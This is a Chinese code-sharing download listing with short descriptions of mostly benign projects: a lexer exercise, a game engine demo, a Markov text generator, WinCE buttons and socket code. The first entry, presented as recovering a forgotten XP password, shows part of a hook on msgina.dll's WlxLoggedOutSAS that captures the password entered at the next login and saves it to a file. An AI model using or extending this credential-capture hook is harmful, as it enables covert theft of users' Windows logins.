-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
Compiler Principle small programs have a small problem source files as follows :...
编译原理小程序 有点小问题 源程序文件内容如下: main() { int a, b a = 10 b = a + 20 } 要求输出如下: (2,”main”) (5,”(”) (5,”)”) (5,”{“} (1,”int”) (2,”a”) (5,”,”) (2,”b”) (5,” ”) (2,”a”) (4,”=”) (3,10) (5,” ”) (2,”b”) (4,”=”) (2,”a”) (4,”+”) (3,20) (5,” ”) (5,”)”)-Compiler Principle small programs have a small problem source files as follows : main () (int a, b a = b = a 10 20) output requirements are as follows : (2, "main") (5 ,"(") (5, " ) ") (5 ,"{"} (1," int ") (2," a ") (5 ,",") (2," b ") (5," ") (2," a " ) (4 ,"=") (3,10) (5, "") (2, "b") (4 ,"=") (2, "a") (4, "") (3,20 ) (5, "") (5 ,")")
- 2022-04-18 02:56:06下载
- 积分:1
-
斜45度游戏引擎的演示程序,不是第一人称视角,类似二位地图的场景。...
斜45度游戏引擎的演示程序,不是第一人称视角,类似二位地图的场景。-Slanting 45 games engine demonstrationprogram,Is not the first person angle of view, similar two maps scene.
- 2022-12-22 12:35:08下载
- 积分:1
-
利用Markov算法根据原始文本的统计规律生成随机文本,利用容器vector, map实现。包含详细的注释和测试数据...
利用Markov算法根据原始文本的统计规律生成随机文本,利用容器vector, map实现。包含详细的注释和测试数据-The use of Markov algorithm based on the statistical laws of the original text to generate a random text, and the use of container vector, map to achieve. Contains detailed notes and test data
- 2023-08-21 18:25:03下载
- 积分:1
-
用VC++6.0调用PowerPoint 2003,生成的ppt文件分3页,既有文字也有图表...
用VC++6.0调用PowerPoint 2003,生成的ppt文件分3页,既有文字也有图表-With VC++ 6.0 Call PowerPoint 2003, generated ppt document 3, both the text also has a chart
- 2022-01-26 06:14:57下载
- 积分:1
-
改代码可实现wince button上帖png透明图片,Bitmap或icon当然也可以。该Button类从CCeButtonST(只能加载icon)修改而来。
改代码可实现wince button上帖png透明图片,Bitmap或icon当然也可以。该Button类从CCeButtonST(只能加载icon)修改而来。-Changed code can be realized with wince button on png transparent image, Bitmap or icon can also be of course. The Button Class from CCeButtonST (can only load the icon) modified from.
- 2023-04-12 21:05:03下载
- 积分:1
-
一个不错的字体类,大家可以下载来看看。
一个不错的字体类,大家可以下载来看看。-The CAutoFont class was designed to eliminate the constant, tedious task of filling a LOGFONT structure everytime you need to create or use a font. It was designed to make font manipulation a simple task
- 2022-08-15 04:58:01下载
- 积分:1
-
C++ Socket 通讯源码 2010
此代码为C++代码,讲SOCKET简单封装了一下,适合新手学习入门。编程工具使用VS2010.
- 2022-02-04 10:12:10下载
- 积分:1
-
Pocketc编写的剪刀石头布游戏,听的乐趣,这是苏…
pocketc写的石头剪刀布游戏,听好玩的,这是源码-pocketc written in stone scissors cloth games, listening to fun, this is the source
- 2022-09-04 16:15:02下载
- 积分:1
-
书上的例子,是本人在学习过程中的作品,上传给大家学习学习...
书上的例子,是本人在学习过程中的作品,上传给大家学习学习-book on the case, I was in the learning process works, we upload to learn from
- 2022-04-28 00:08:35下载
- 积分:1